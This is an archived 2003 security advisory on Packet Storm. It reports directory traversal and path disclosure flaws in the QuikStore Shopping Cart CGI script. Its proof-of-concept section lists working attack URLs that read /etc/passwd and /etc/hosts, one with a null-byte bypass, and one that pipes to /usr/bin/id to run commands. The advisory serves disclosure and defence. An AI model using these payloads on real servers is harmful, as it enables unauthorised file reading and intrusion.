exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

quikstore.txt

quikstore.txt
Posted Dec 29, 2003
Authored by Dr'Ponidi

The QuikStore Shopping Cart suffers from directory traversal vulnerabilities that allow a remote attacker to gain access to files outside of the webroot and also discloses installation path information on error pages.

tags | exploit, remote, vulnerability
SHA-256 | 1909b9205f8e858593bf6fbdf9e7a9ba9e814a40508c1059dd391f12655794d9

quikstore.txt

Change Mirror Download
Indonesia Security Development Team Advisory

QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
=====================================================================

Advisory Name: QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
Release Date: 5:08 23/12/03
Application: QuikStore Shopping Cart
Author: Dr`Ponidi <drponidi@kecoak.org>
Discover by: Dr`Ponidi <drponidi@kecoak.org>
Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
Vendor Status: The vendor has been contacted
Vendor URL: http://www.quikstore.com
Reference: http://drponidi.5u.com/advisory.htm
Greetz to: #indohack #k-elektronik #dhegleng @ dal.net

[Details]
A remote user can reportedly send request to cause the system
to display an error message that indicates the installation path.
It's possible to make a malformed http request for many files in
QuikStore Shopping Cart and in doing so trigger an error.
The resulting error message will disclose potentially sensitive installation
path information to the remote attacker.QuikStore Shopping Cart allows remote
file reading too, users can view files on the system with the privileges of the web server.

[Proof of Concept]
http://[target]/cgi-bin/quikstore.cgi?store='
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id|

[Suggestions]
Filter all files

[Patch:]
Not yet available

[About Indonesia Security Development Team]
Indonesia Security Development Team researches and develops
intelligent, advanced application security assessment. Based in
Indonesia, Indonesia Security Development Team offers the best of
breed security consulting services, specializing in shopping carts
software and network security assessments. We provide security
information and patches for use by the entire network security community.



This information is provided freely to all interested parties and may
be redistributed provided that it is not altered in any way, and that
the author is appropriately credited

Indonesia Security Development Team Advisory:
http://drponidi.5u.com/advisory.htm
_______________________________________________________________
Dr`Ponidi <drponidi@kecoak.org>
Original document can be fount at http://drponidi.5u.com/advisory.htm




--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close